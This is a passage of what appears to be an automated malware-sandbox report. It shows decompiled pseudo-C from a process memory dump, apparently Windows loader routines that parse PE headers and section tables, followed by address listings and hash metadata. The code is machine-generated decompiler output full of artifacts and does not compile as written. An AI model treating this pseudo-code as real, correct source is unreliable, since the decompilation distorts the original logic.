                                                																if( *((short*)(_t353 + 0x3a)) != 0) {
                                                																	_t342 = 0;
                                                																	__eflags = 0;
                                                																	E016237F5(_t353, 0);
                                                																}
                                                																E01620413(_t353);
                                                																_t256 =  *(_t353 + 0x48);
                                                																__eflags = _t256;
                                                																if(_t256 != 0) {
                                                																	__eflags = _t256 - 0xffffffff;
                                                																	if(_t256 != 0xffffffff) {
                                                																		E01619B10(_t256);
                                                																	}
                                                																}
                                                																__eflags =  *(_t353 + 0x28);
                                                																if( *(_t353 + 0x28) != 0) {
                                                																	_t174 = _t353 + 0x24; // 0x24
                                                																	E016102D6(_t174);
                                                																}
                                                																L016077F0( *0x16d7b98, 0, _t353);
                                                																__eflags = _v180 - _t293;
                                                																if(__eflags == 0) {
                                                																	E0161C277(_t293, _t366);
                                                																}
                                                																_t288 = _v164;
                                                																goto L40;
                                                															}
                                                														}
                                                													} else {
                                                														goto L40;
                                                													}
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										L015FEC7F(_t353);
                                                										L016119B8(_t287, 0, _t353, 0);
                                                										_t200 = E015EF4E3(__eflags);
                                                										continue;
                                                									}
                                                								}
                                                								L41:
                                                								if(_v157 != 0) {
                                                									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                								}
                                                								if(_t366 < 0 || ( *0x16db2f8 |  *0x16db2fc) == 0 || ( *0x16db2e4 & 0x00000001) != 0) {
                                                									L46:
                                                									 *_v212 = _v168;
                                                									_t204 = _t366;
                                                									L47:
                                                									_pop(_t354);
                                                									_pop(_t367);
                                                									_pop(_t289);
                                                									return E0162B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                                								} else {
                                                									_v200 = 0;
                                                									if(( *0x16db2ec >> 0x00000008 & 0x00000003) == 3) {
                                                										_t355 = _v168;
                                                										_t342 =  &_v208;
                                                										_t208 = E01696B68(_v168,  &_v208, _v168, __eflags);
                                                										__eflags = _t208 - 1;
                                                										if(_t208 == 1) {
                                                											goto L46;
                                                										} else {
                                                											__eflags = _v208 & 0x00000010;
                                                											if((_v208 & 0x00000010) == 0) {
                                                												goto L46;
                                                											} else {
                                                												_t342 = 4;
                                                												_t366 = E01696AEB(_t355, 4,  &_v216);
                                                												__eflags = _t366;
                                                												if(_t366 >= 0) {
                                                													goto L46;
                                                												} else {
                                                													asm("int 0x29");
                                                													_t356 = 0;
                                                													_v44 = 0;
                                                													_t290 = _v52;
                                                													__eflags = 0;
                                                													if(0 == 0) {
                                                														L108:
                                                														_t356 = 0;
                                                														_v44 = 0;
                                                														goto L63;
                                                													} else {
                                                														__eflags = 0;
                                                														if(0 < 0) {
                                                															goto L108;
                                                														}
                                                														L63:
                                                														_v112 = _t356;
                                                														__eflags = _t356;
                                                														if(_t356 == 0) {
                                                															L143:
                                                															_v8 = 0xfffffffe;
                                                															_t211 = 0xc0000089;
                                                														} else {
                                                															_v36 = 0;
                                                															_v60 = 0;
                                                															_v48 = 0;
                                                															_v68 = 0;
                                                															_v44 = _t290 & 0xfffffffc;
                                                															E015FE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                                															_t306 = _v68;
                                                															__eflags = _t306;
                                                															if(_t306 == 0) {
                                                																_t216 = 0xc000007b;
                                                																_v36 = 0xc000007b;
                                                																_t307 = _v60;
                                                															} else {
                                                																__eflags = _t290 & 0x00000001;
                                                																if(__eflags == 0) {
                                                																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                                																	__eflags = _t349 - 0x10b;
                                                																	if(_t349 != 0x10b) {
                                                																		__eflags = _t349 - 0x20b;
                                                																		if(_t349 == 0x20b) {
                                                																			goto L102;
                                                																		} else {
                                                																			_t307 = 0;
                                                																			_v48 = 0;
                                                																			_t216 = 0xc000007b;
                                                																			_v36 = 0xc000007b;
                                                																			goto L71;
                                                																		}
                                                																	} else {
                                                																		L102:
                                                																		_t307 =  *(_t306 + 0x50);
                                                																		goto L69;
                                                																	}
                                                																	goto L151;
                                                																} else {
                                                																	_t239 = L015FEAEA(_t290, _t290, _t356, _t366, __eflags);
                                                																	_t307 = _t239;
                                                																	_v60 = _t307;
                                                																	_v48 = _t307;
                                                																	__eflags = _t307;
                                                																	if(_t307 != 0) {
                                                																		L70:
                                                																		_t216 = _v36;
                                                																	} else {
                                                																		_push(_t239);
                                                																		_push(0x14);
                                                																		_push( &_v144);
                                                																		_push(3);
                                                																		_push(_v44);
                                                																		_push(0xffffffff);
                                                																		_t319 = E01629730();
                                                																		_v36 = _t319;
                                                																		__eflags = _t319;
                                                																		if(_t319 < 0) {
                                                																			_t216 = 0xc000001f;
                                                																			_v36 = 0xc000001f;
                                                																			_t307 = _v60;
                                                																		} else {
                                                																			_t307 = _v132;
                                                																			L69:
                                                																			_v48 = _t307;
                                                																			goto L70;
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                															L71:
                                                															_v72 = _t307;
                                                															_v84 = _t216;
                                                															__eflags = _t216 - 0xc000007b;
                                                															if(_t216 == 0xc000007b) {
                                                																L150:
                                                																_v8 = 0xfffffffe;
                                                																_t211 = 0xc000007b;
                                                															} else {
                                                																_t344 = _t290 & 0xfffffffc;
                                                																_v76 = _t344;
                                                																__eflags = _v40 - _t344;
                                                																if(_v40 <= _t344) {
                                                																	goto L150;
                                                																} else {
                                                																	__eflags = _t307;
                                                																	if(_t307 == 0) {
                                                																		L75:
                                                																		_t217 = 0;
                                                																		_v104 = 0;
                                                																		__eflags = _t366;
                                                																		if(_t366 != 0) {
                                                																			__eflags = _t290 & 0x00000001;
                                                																			if((_t290 & 0x00000001) != 0) {
                                                																				_t217 = 1;
                                                																				_v104 = 1;
                                                																			}
                                                																			_t290 = _v44;
                                                																			_v52 = _t290;
                                                																		}
                                                																		__eflags = _t217 - 1;
                                                																		if(_t217 != 1) {
                                                																			_t369 = 0;
                                                																			_t218 = _v40;
                                                																			goto L91;
                                                																		} else {
                                                																			_v64 = 0;
                                                																			E015FE9C0(1, _t290, 0, 0,  &_v64);
                                                																			_t309 = _v64;
                                                																			_v108 = _t309;
                                                																			__eflags = _t309;
                                                																			if(_t309 == 0) {
                                                																				goto L143;
                                                																			} else {
                                                																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                                																				__eflags = _t226 - 0x10b;
                                                																				if(_t226 != 0x10b) {
                                                																					__eflags = _t226 - 0x20b;
                                                																					if(_t226 != 0x20b) {
                                                																						goto L143;
                                                																					} else {
                                                																						_t371 =  *(_t309 + 0x98);
                                                																						goto L83;
                                                																					}
                                                																				} else {
                                                																					_t371 =  *(_t309 + 0x88);
                                                																					L83:
                                                																					__eflags = _t371;
                                                																					if(_t371 != 0) {
                                                																						_v80 = _t371 - _t356 + _t290;
                                                																						_t310 = _v64;
                                                																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                                																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                                                																						_t311 = 0;
                                                																						__eflags = 0;
                                                																						while(1) {
                                                																							_v120 = _t311;
                                                																							_v116 = _t348;
                                                																							__eflags = _t311 - _t292;
                                                																							if(_t311 >= _t292) {
                                                																								goto L143;
                                                																							}
                                                																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                                																							__eflags = _t371 - _t359;
                                                																							if(_t371 < _t359) {
                                                																								L98:
                                                																								_t348 = _t348 + 0x28;
                                                																								_t311 = _t311 + 1;
                                                																								continue;
                                                																							} else {
                                                																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                                																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                                																									goto L98;
                                                																								} else {
                                                																									__eflags = _t348;
                                                																									if(_t348 == 0) {
                                                																										goto L143;
                                                																									} else {
                                                																										_t218 = _v40;
                                                																										_t312 =  *_t218;
                                                																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                                																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                                																											_v100 = _t359;
                                                																											_t360 = _v108;
                                                																											_t372 = L015F8F44(_v108, _t312);
                                                																											__eflags = _t372;
                                                																											if(_t372 == 0) {
                                                																												goto L143;
                                                																											} else {
                                                																												_t290 = _v52;
                                                																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01623C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                                																												_t307 = _v72;
                                                																												_t344 = _v76;
                                                																												_t218 = _v40;
                                                																												goto L91;
                                                																											}
                                                																										} else {
                                                																											_t290 = _v52;
                                                																											_t307 = _v72;
                                                																											_t344 = _v76;
                                                																											_t369 = _v80;
                                                																											L91:
                                                																											_t358 = _a4;
                                                																											__eflags = _t358;
                                                																											if(_t358 == 0) {
                                                																												L95:
                                                																												_t308 = _a8;
                                                																												__eflags = _t308;
                                                																												if(_t308 != 0) {
                                                																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                                																												}
                                                																												_v8 = 0xfffffffe;
                                                																												_t211 = _v84;
                                                																											} else {
                                                																												_t370 =  *_t218 - _t369 + _t290;
                                                																												 *_t358 = _t370;
                                                																												__eflags = _t370 - _t344;
                                                																												if(_t370 <= _t344) {
                                                																													L149:
                                                																													 *_t358 = 0;
                                                																													goto L150;
                                                																												} else {
                                                																													__eflags = _t307;
                                                																													if(_t307 == 0) {
                                                																														goto L95;
                                                																													} else {
                                                																														__eflags = _t370 - _t344 + _t307;
                                                																														if(_t370 >= _t344 + _t307) {
                                                																															goto L149;
                                                																														} else {
                                                																															goto L95;
                                                																														}
                                                																													}
                                                																												}
                                                																											}
                                                																										}
                                                																									}
                                                																								}
                                                																							}
                                                																							goto L97;
                                                																						}
                                                																					}
                                                																					goto L143;
                                                																				}
                                                																			}
                                                																		}
                                                																	} else {
                                                																		__eflags = _v40 - _t307 + _t344;
                                                																		if(_v40 >= _t307 + _t344) {
                                                																			goto L150;
                                                																		} else {
                                                																			goto L75;
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														}
                                                														L97:
                                                														 *[fs:0x0] = _v20;
                                                														return _t211;
                                                													}
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										goto L46;
                                                									}
                                                								}
                                                								goto L151;
                                                							}
                                                							_t288 = _v164;
                                                							_t366 = 0xc0000135;
                                                							goto L41;
                                                						}
                                                					}
                                                				}
                                                				L151:
                                                			}
                                                0x0164b4a5
                                                0x0164b4ab
                                                0x0164b4b3
                                                0x0164b4b8
                                                0x0164b4bb
                                                0x00000000
                                                0x0164b4c1
                                                0x0164b4c1
                                                0x0164b4c8
                                                0x00000000
                                                0x0164b4ce
                                                0x0164b4d4
                                                0x0164b4e1
                                                0x0164b4e3
                                                0x0164b4e5
                                                0x00000000
                                                0x0164b4eb
                                                0x0164b4f0
                                                0x0164b4f2
                                                0x015fdac9
                                                0x015fdacc
                                                0x015fdacf
                                                0x015fdad1
                                                0x015fdd78
                                                0x015fdd78
                                                0x015fdcf2
                                                0x00000000
                                                0x015fdad7
                                                0x015fdad9
                                                0x015fdadb
                                                0x00000000
                                                0x00000000
                                                0x015fdae1
                                                0x015fdae1
                                                0x015fdae4
                                                0x015fdae6
                                                0x0164b4f9
                                                0x0164b4f9
                                                0x0164b500
                                                0x015fdaec
                                                0x015fdaec
                                                0x015fdaf5
                                                0x015fdaf8
                                                0x015fdafb
                                                0x015fdb03
                                                0x015fdb11
                                                0x015fdb16
                                                0x015fdb19
                                                0x015fdb1b
                                                0x0164b52c
                                                0x0164b531
                                                0x0164b534
                                                0x015fdb21
                                                0x015fdb21
                                                0x015fdb24
                                                0x015fdcd9
                                                0x015fdce2
                                                0x015fdce5
                                                0x015fdd6a
                                                0x015fdd6d
                                                0x00000000
                                                0x015fdd73
                                                0x0164b51a
                                                0x0164b51c
                                                0x0164b51f
                                                0x0164b524
                                                0x00000000
                                                0x0164b524
                                                0x015fdce7
                                                0x015fdce7
                                                0x015fdce7
                                                0x00000000
                                                0x015fdce7
                                                0x00000000
                                                0x015fdb2a
                                                0x015fdb2c
                                                0x015fdb31
                                                0x015fdb33
                                                0x015fdb36
                                                0x015fdb39
                                                0x015fdb3b
                                                0x015fdb66
                                                0x015fdb66
                                                0x015fdb3d
                                                0x015fdb3d
                                                0x015fdb3e
                                                0x015fdb46
                                                0x015fdb47
                                                0x015fdb49
                                                0x015fdb4c
                                                0x015fdb53
                                                0x015fdb55
                                                0x015fdb58
                                                0x015fdb5a
                                                0x0164b50a
                                                0x0164b50f
                                                0x0164b512
                                                0x015fdb60
                                                0x015fdb60
                                                0x015fdb63
                                                0x015fdb63
                                                0x00000000
                                                0x015fdb63
                                                0x015fdb5a
                                                0x015fdb3b
                                                0x015fdb24
                                                0x015fdb69
                                                0x015fdb69
                                                0x015fdb6c
                                                0x015fdb6f
                                                0x015fdb74
                                                0x0164b557
                                                0x0164b557
                                                0x0164b55e
                                                0x015fdb7a
                                                0x015fdb7c
                                                0x015fdb7f
                                                0x015fdb82
                                                0x015fdb85
                                                0x00000000
                                                0x015fdb8b
                                                0x015fdb8b
                                                0x015fdb8d
                                                0x015fdb9b
                                                0x015fdb9b
                                                0x015fdb9d
                                                0x015fdba0
                                                0x015fdba2
                                                0x015fdba4
                                                0x015fdba7
                                                0x015fdba9
                                                0x015fdbae
                                                0x015fdbae
                                                0x015fdbb1
                                                0x015fdbb4
                                                0x015fdbb4
                                                0x015fdbb7
                                                0x015fdbba
                                                0x015fdcd2
                                                0x015fdcd4
                                                0x00000000
                                                0x015fdbc0
                                                0x015fdbc0
                                                0x015fdbd2
                                                0x015fdbd7
                                                0x015fdbda
                                                0x015fdbdd
                                                0x015fdbdf
                                                0x00000000
                                                0x015fdbe5
                                                0x015fdbe5
                                                0x015fdbee
                                                0x015fdbf1
                                                0x0164b541
                                                0x0164b544
                                                0x00000000
                                                0x0164b546
                                                0x0164b546
                                                0x00000000
                                                0x0164b546
                                                0x015fdbf7
                                                0x015fdbf7
                                                0x015fdbfd
                                                0x015fdbfd
                                                0x015fdbff
                                                0x015fdc0b
                                                0x015fdc15
                                                0x015fdc1b
                                                0x015fdc1d
                                                0x015fdc21
                                                0x015fdc21
                                                0x015fdc23
                                                0x015fdc23
                                                0x015fdc26
                                                0x015fdc29
                                                0x015fdc2b
                                                0x00000000
                                                0x00000000
                                                0x015fdc31
                                                0x015fdc34
                                                0x015fdc36
                                                0x015fdcbf
                                                0x015fdcbf
                                                0x015fdcc2
                                                0x00000000
                                                0x015fdc3c
                                                0x015fdc41
                                                0x015fdc43
                                                0x00000000
                                                0x015fdc45
                                                0x015fdc45
                                                0x015fdc47
                                                0x00000000
                                                0x015fdc4d
                                                0x015fdc4d
                                                0x015fdc50
                                                0x015fdc52
                                                0x015fdc55
                                                0x015fdcfa
                                                0x015fdcfe
                                                0x015fdd08
                                                0x015fdd0a
                                                0x015fdd0c
                                                0x00000000
                                                0x015fdd12
                                                0x015fdd15
                                                0x015fdd2d
                                                0x015fdd2f
                                                0x015fdd32
                                                0x015fdd35
                                                0x00000000
                                                0x015fdd35
                                                0x015fdc5b
                                                0x015fdc5b
                                                0x015fdc5e
                                                0x015fdc61
                                                0x015fdc64
                                                0x015fdc67
                                                0x015fdc67
                                                0x015fdc6a
                                                0x015fdc6c
                                                0x015fdc8e
                                                0x015fdc8e
                                                0x015fdc91
                                                0x015fdc93
                                                0x015fdcce
                                                0x015fdcce
                                                0x015fdc95
                                                0x015fdc9c
                                                0x015fdc6e
                                                0x015fdc72
                                                0x015fdc75
                                                0x015fdc77
                                                0x015fdc79
                                                0x0164b551
                                                0x0164b551
                                                0x00000000
                                                0x015fdc7f
                                                0x015fdc7f
                                                0x015fdc81
                                                0x00000000
                                                0x015fdc83
                                                0x015fdc86
                                                0x015fdc88
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x015fdc88
                                                0x015fdc81
                                                0x015fdc79
                                                0x015fdc6c
                                                0x015fdc55
                                                0x015fdc47
                                                0x015fdc43
                                                0x00000000
                                                0x015fdc36
                                                0x015fdc23
                                                0x00000000
                                                0x015fdbff
                                                0x015fdbf1
                                                0x015fdbdf
                                                0x015fdb8f
                                                0x015fdb92
                                                0x015fdb95
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x015fdb95
                                                0x015fdb8d
                                                0x015fdb85
                                                0x015fdb74
                                                0x015fdc9f
                                                0x015fdca2
                                                0x015fdcb0
                                                0x015fdcb0
                                                0x015fdad1
                                                0x0164b4e5
                                                0x0164b4c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x015fd831
                                                0x00000000
                                                0x015fd800
                                                0x0164b47f
                                                0x0164b485
                                                0x00000000
                                                0x0164b485
                                                0x015fd665
                                                0x015fd652
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ad94833191a11ddf7a4cee006a7821b2f2308ce22cfe6b0fbbf8ae7f9f475676
                                                • Instruction ID: 4a2739f53eddae19ecb3dc0acb29dad387ebb96b89c392fe82379cd9718813ce
                                                • Opcode Fuzzy Hash: ad94833191a11ddf7a4cee006a7821b2f2308ce22cfe6b0fbbf8ae7f9f475676
                                                • Instruction Fuzzy Hash: C2E1BE31A0225ACFEB35DF69CC84B6EB7B2BF85304F0441ADDA099F295D734A981CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E015F849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                                				void* _t136;
                                                				signed int _t139;
                                                				signed int _t141;
                                                				signed int _t145;
                                                				intOrPtr _t146;
                                                				signed int _t149;
                                                				signed int _t150;
                                                				signed int _t161;
                                                				signed int _t163;
                                                				signed int _t165;
                                                				signed int _t169;
                                                				signed int _t171;
                                                				signed int _t194;
                                                				signed int _t200;
                                                				void* _t201;
                                                				signed int _t204;
                                                				signed int _t206;
                                                				signed int _t210;
                                                				signed int _t214;
                                                				signed int _t215;
                                                				signed int _t218;
                                                				void* _t221;
                                                				signed int _t224;
                                                				signed int _t226;
                                                				intOrPtr _t228;
                                                				signed int _t232;
                                                				signed int _t233;
                                                				signed int _t234;
                                                				void* _t237;
                                                				void* _t238;
                                                
                                                				_t236 = __esi;
                                                				_t235 = __edi;
                                                				_t193 = __ebx;
                                                				_push(0x70);
                                                				_push(0x16bf9c0);
                                                				E0163D0E8(__ebx, __edi, __esi);
                                                				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                                				if( *0x16d7b04 == 0) {
                                                					L4:
                                                					goto L5;
                                                				} else {
                                                					_t136 = E015FCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                                					_t236 = 0;
                                                					if(_t136 < 0) {
                                                						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                                					}
                                                					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                                						_t193 =  *( *[fs:0x30] + 0x18);
                                                						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                                						 *(_t237 - 0x68) = _t236;
                                                						 *(_t237 - 0x6c) = _t236;
                                                						_t235 = _t236;
                                                						 *(_t237 - 0x60) = _t236;
                                                						E01602280( *[fs:0x30], 0x16d8550);
                                                						_t139 =  *0x16d7b04; // 0x1
                                                						__eflags = _t139 - 1;
                                                						if(__eflags != 0) {
                                                							_t200 = 0xc;
                                                							_t201 = _t237 - 0x40;
                                                							_t141 = E0161F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                                							 *(_t237 - 0x44) = _t141;
                                                							__eflags = _t141;
                                                							if(_t141 < 0) {
                                                								L50:
                                                								E015FFFB0(_t193, _t235, 0x16d8550);
                                                								L5:
                                                								return E0163D130(_t193, _t235, _t236);
                                                							}
                                                							_push(_t201);
                                                							_t221 = 0x10;
                                                							_t202 =  *(_t237 - 0x40);
                                                							_t145 = E015E1C45( *(_t237 - 0x40), _t221);
                                                							 *(_t237 - 0x44) = _t145;
                                                							__eflags = _t145;
                                                							if(_t145 < 0) {
                                                								goto L50;
                                                							}
                                                							_t146 =  *0x16d7b9c; // 0x0
                                                							_t235 = L01604620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                                							 *(_t237 - 0x60) = _t235;
                                                							__eflags = _t235;
                                                							if(_t235 == 0) {
                                                								_t149 = 0xc0000017;
                                                								 *(_t237 - 0x44) = 0xc0000017;
                                                							} else {
                                                								_t149 =  *(_t237 - 0x44);
                                                							}
                                                							__eflags = _t149;
                                                							if(__eflags >= 0) {
                                                								L8:
                                                								 *(_t237 - 0x64) = _t235;
                                                								_t150 =  *0x16d7b10; // 0x0
                                                								 *(_t237 - 0x4c) = _t150;
                                                								_push(_t237 - 0x74);
                                                								_push(_t237 - 0x39);
                                                								_push(_t237 - 0x58);
                                                								_t193 = E0161A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                                								 *(_t237 - 0x44) = _t193;
                                                								__eflags = _t193;
                                                								if(_t193 < 0) {
                                                									L30:
                                                									E015FFFB0(_t193, _t235, 0x16d8550);
                                                									__eflags = _t235 - _t237 - 0x38;
                                                									if(_t235 != _t237 - 0x38) {
                                                										_t235 =  *(_t237 - 0x48);
                                                										L016077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                                									} else {
                                                										_t235 =  *(_t237 - 0x48);
                                                									}
                                                									__eflags =  *(_t237 - 0x6c);
                                                									if( *(_t237 - 0x6c) != 0) {
                                                										L016077F0(_t235, _t236,  *(_t237 - 0x6c));
                                                									}
                                                									__eflags = _t193;
                                                									if(_t193 >= 0) {
                                                										goto L4;
                                                									} else {
                                                										goto L5;
                                                									}
                                                								}
                                                								_t204 =  *0x16d7b04; // 0x1
                                                								 *(_t235 + 8) = _t204;
                                                								__eflags =  *((char*)(_t237 - 0x39));
                                                								if( *((char*)(_t237 - 0x39)) != 0) {
                                                									 *(_t235 + 4) = 1;
                                                									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                                									_t161 =  *0x16d7b10; // 0x0
                                                									 *(_t237 - 0x4c) = _t161;
                                                								} else {
                                                									 *(_t235 + 4) = _t236;
                                                									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                                								}
                                                								 *((intOrPtr*)(_t237 - 0x54)) = E016237C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                                								_t224 = _t236;
                                                								 *(_t237 - 0x40) = _t236;
                                                								 *(_t237 - 0x50) = _t236;
                                                								while(1) {
                                                									_t163 =  *(_t235 + 8);
                                                									__eflags = _t224 - _t163;
                                                									if(_t224 >= _t163) {
                                                										break;
                                                									}
                                                									_t228 =  *0x16d7b9c; // 0x0
                                                									_t214 = L01604620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                                									 *(_t237 - 0x78) = _t214;
                                                									__eflags = _t214;
                                                									if(_t214 == 0) {
                                                										L52:
                                                										_t193 = 0xc0000017;
                                                										L19:
                                                										 *(_t237 - 0x44) = _t193;
                                                										L20:
                                                										_t206 =  *(_t237 - 0x40);
                                                										__eflags = _t206;
                                                										if(_t206 == 0) {
                                                											L26:
                                                											__eflags = _t193;
                                                											if(_t193 < 0) {
                                                												E016237F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                                												__eflags =  *((char*)(_t237 - 0x39));
                                                												if( *((char*)(_t237 - 0x39)) != 0) {
                                                													 *0x16d7b10 =  *0x16d7b10 - 8;
                                                												}
                                                											} else {
                                                												_t169 =  *(_t237 - 0x68);
                                                												__eflags = _t169;
                                                												if(_t169 != 0) {
                                                													 *0x16d7b04 =  *0x16d7b04 - _t169;
                                                												}
                                                											}
                                                											__eflags = _t193;
                                                											if(_t193 >= 0) {
                                                												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                                											}
                                                											goto L30;
                                                										}
                                                										_t226 = _t206 * 0xc;
                                                										__eflags = _t226;
                                                										_t194 =  *(_t237 - 0x48);
                                                										do {
                                                											 *(_t237 - 0x40) = _t206 - 1;
                                                											_t226 = _t226 - 0xc;
                                                											 *(_t237 - 0x4c) = _t226;
                                                											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                                											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                                												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                                												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                                													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                                													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                													__eflags =  *((char*)(_t237 - 0x39));
                                                													if( *((char*)(_t237 - 0x39)) == 0) {
                                                														_t171 = _t210;
                                                													} else {
                                                														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                                														L016077F0(_t194, _t236, _t210 - 8);
                                                														_t171 =  *(_t237 - 0x50);
                                                													}
                                                													L48:
                                                													L016077F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                                													L46:
                                                													_t206 =  *(_t237 - 0x40);
                                                													_t226 =  *(_t237 - 0x4c);
                                                													goto L24;
                                                												}
                                                												 *0x16d7b08 =  *0x16d7b08 + 1;
                                                												goto L24;
                                                											}
                                                											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                											__eflags = _t171;
                                                											if(_t171 != 0) {
                                                												__eflags =  *((char*)(_t237 - 0x39));
                                                												if( *((char*)(_t237 - 0x39)) == 0) {
                                                													goto L48;
                                                												}
                                                												E016257C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                                												goto L46;
                                                											}
                                                											L24:
                                                											__eflags = _t206;
                                                										} while (_t206 != 0);
                                                										_t193 =  *(_t237 - 0x44);
                                                										goto L26;
                                                									}
                                                									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                                									 *(_t237 - 0x7c) = _t232;
                                                									 *(_t232 - 4) = _t214;
                                                									 *(_t237 - 4) = _t236;
                                                									E0162F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                                									_t238 = _t238 + 0xc;
                                                									 *(_t237 - 4) = 0xfffffffe;
                                                									_t215 =  *(_t237 - 0x48);
                                                									__eflags = _t193;
                                                									if(_t193 < 0) {
                                                										L016077F0(_t215, _t236,  *(_t237 - 0x78));
                                                										goto L20;
                                                									}
                                                									__eflags =  *((char*)(_t237 - 0x39));
                                                									if( *((char*)(_t237 - 0x39)) != 0) {
                                                										_t233 = E0161A44B( *(_t237 - 0x4c));
                                                										 *(_t237 - 0x50) = _t233;
                                                										__eflags = _t233;
                                                										if(_t233 == 0) {
                                                											L016077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                                											goto L52;
                                                										}
                                                										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                                										L17:
                                                										_t234 =  *(_t237 - 0x40);
                                                										_t218 = _t234 * 0xc;
                                                										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                                										 *(_t218 + _t235 + 0x10) = _t236;
                                                										_t224 = _t234 + 1;
                                                										 *(_t237 - 0x40) = _t224;
                                                										 *(_t237 - 0x50) = _t224;
                                                										_t193 =  *(_t237 - 0x44);
                                                										continue;
                                                									}
                                                									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                                									goto L17;
                                                								}
                                                								 *_t235 = _t236;
                                                								_t165 = 0x10 + _t163 * 0xc;
                                                								__eflags = _t165;
                                                								_push(_t165);
                                                								_push(_t235);
                                                								_push(0x23);
                                                								_push(0xffffffff);
                                                								_t193 = E016296C0();
                                                								goto L19;
                                                							} else {
                                                								goto L50;
                                                							}
                                                						}
                                                						_t235 = _t237 - 0x38;
                                                						 *(_t237 - 0x60) = _t235;
                                                						goto L8;
                                                					}
                                                					goto L4;
                                                				}
                                                			}

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cb0cc33bb36032384bf9eca80d3e3074ca919e15433f78fa5793598c23eae2df
                                                • Instruction ID: 0b34a811b2cb7b3df9a6612ae66f3c6fd7669b771c9d03313794b16a11015f0f
                                                • Opcode Fuzzy Hash: cb0cc33bb36032384bf9eca80d3e3074ca919e15433f78fa5793598c23eae2df
                                                • Instruction Fuzzy Hash: 80B16D70E0120ADFDB25DFD9CD84AAEBBB6BF58308F10452DE605AB345D770A945CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E0161513A(intOrPtr __ecx, void* __edx) {
                                                				signed int _v8;
                                                				signed char _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				char _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				intOrPtr _v44;
                                                				intOrPtr _v48;
                                                				char _v63;
                                                				char _v64;
                                                				signed int _v72;
                                                				signed int _v76;
                                                				signed int _v80;
                                                				signed int _v84;
                                                				signed int _v88;
                                                				signed char* _v92;
                                                				signed int _v100;
                                                				signed int _v104;
                                                				char _v105;
                                                				void* __ebx;
                                                				void* __edi;
